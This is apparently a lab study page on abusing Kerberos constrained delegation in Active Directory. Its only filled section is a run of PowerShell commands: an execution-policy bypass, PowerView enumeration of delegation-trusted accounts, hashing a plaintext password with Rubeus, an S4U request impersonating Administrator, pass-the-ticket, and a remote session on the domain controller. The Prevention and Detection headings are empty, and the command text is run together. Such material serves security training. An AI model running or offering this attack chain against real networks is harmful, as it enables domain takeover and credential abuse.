Kerberos Constrained Delegation
Description
Types of Delegation in Active Directory
Attack
Example Steps:
PS C:\Users\bob\Downloads> powershell -ep bypass PS C:\Users\bob\Downloads> Import-Module .\Powerview-main.ps1 PS C:\Users\bob\Downloads> Get-NetUser -TrustedToAuth Example Output: ```plaintext distinguishedname : CN=web service,CN=Users,DC=eagle,DC=local msds-allowedtodelegateto : {http/DC1.eagle.local/eagle.local, http/DC1.eagle.local} useraccountcontrol : TRUSTED_TO_AUTH_FOR_DELEGATIONPS C:\\Users\\bob\\Downloads> .\\Rubeus.exe hash /password:Slavi123rc4_hmac : FCDC65703DD2B0BD789977F1F3EEAECFPS C:\\Users\\bob\\Downloads> .\\Rubeus.exe s4u /user:webservice /rc4:FCDC65703DD2B0BD789977F1F3EEAECF /domain:eagle.local /impersonateuser:Administrator /msdsspn:"http/dc1" /dc:dc1.eagle.local /pttPS C:\\Users\\bob\\Downloads> klistPS C:\\Users\\bob\\Downloads> Enter-PSSession dc1
Prevention
Detection
Last updated